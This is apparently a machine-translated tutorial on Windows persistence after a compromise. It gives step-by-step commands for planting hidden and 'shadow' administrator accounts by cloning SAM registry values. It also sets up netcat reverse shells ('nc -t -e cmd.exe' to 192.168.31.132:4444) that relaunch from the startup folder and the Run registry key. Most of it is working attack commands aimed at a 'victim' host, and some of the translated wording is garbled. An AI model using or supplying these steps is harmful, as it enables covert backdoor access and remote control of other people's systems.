Shadow account creation
Create a common account
net user laosec 123admiN@ /add #Create a common account laosec with a password of 123admiN@
net localgroup administrators laosec /add #Add a common account laosec to the administrators group
Create a hidden account
net user laosec$ 123admiN@ /add #Create a hidden account laosec$ with a password of 123admiN@ (visible by computer management)
net localgroup administrators laosec$ /add #Add the hidden account laosec$ to the administrators group
Create a shadow account
Step 1: Open the registration form
WIN+R-->regedit #Registry editor command
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
#Encountered no permission problem Right-click HKEY_LOCAL_MACHINE/SAM/SAM -> permission to give the current user administrator full control and read Get permission
Step 2: Modify the hidden account
In the Users directory, there are files starting with 00000XXX and Names.
Find the administrator under the Names folder and click to see the type on the right. The value of the type corresponds to the above 00000XXX.
Select the 00000XXX corresponding to the administrator. Double-click on the right F key value, copy all the value content in the pop-up window
#This value should be given to the F key of the shadow account to be created . Find the type value of the account to be modified in Names, find its corresponding 00000XXX, and overwrite the value in F of its shadow account with the content just copied
Export the shadow account under Names as 1.reg
Export the 00000XXX corresponding to the shadow account under Users as 2.reg
Step 3: Delete hidden accounts
net user laosec$ /del #Delete the hidden account laosec$
Step 4: Create a hidden account
The 1.reg into the registry
will 2.reg into the registry
Step 5: Logout and login verification
The
idea of NC automatic rebound is
to get the target and its CMD Shell by uploading the NC and configuring the registry or starting the program -> restart the server
The network of the victim and the victim can communicate with each other
. The VPS must always monitor the corresponding port
NC routine test
nc -lvvp port #The VPS operation of the
victim listens to the local port nc -t -e cmd.exe ip port #The victim operation is connected to the VPS of the victim
- Self-startup directory
In the victim host, go to the
C:\Documents and Settings\Administrator\"Start" menu\Programs\Start to
create the sys.bat in the boot-up directory C:\Documents and Settings\Administrator\
Start /b nc -t -e cmd.exe 192.168.31.132 4444
Enable listening on the host of the
victim, restart the victim's host, and wait for the shell to rebound
- Registry startup
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “sysone” /t REG_SZ /d “C:sys.bat” /f
Parameter Description:
/ v name value under the option to add
/ t RegKey data type, if ignored, is used REG_SZ
/ d to assign to add registry data ValueName
/ f without prompting forcibly overwrite existing registry entries
in The host of the *** host starts listening and
restarts the host of the victim, waiting for the shell to rebound
Result verification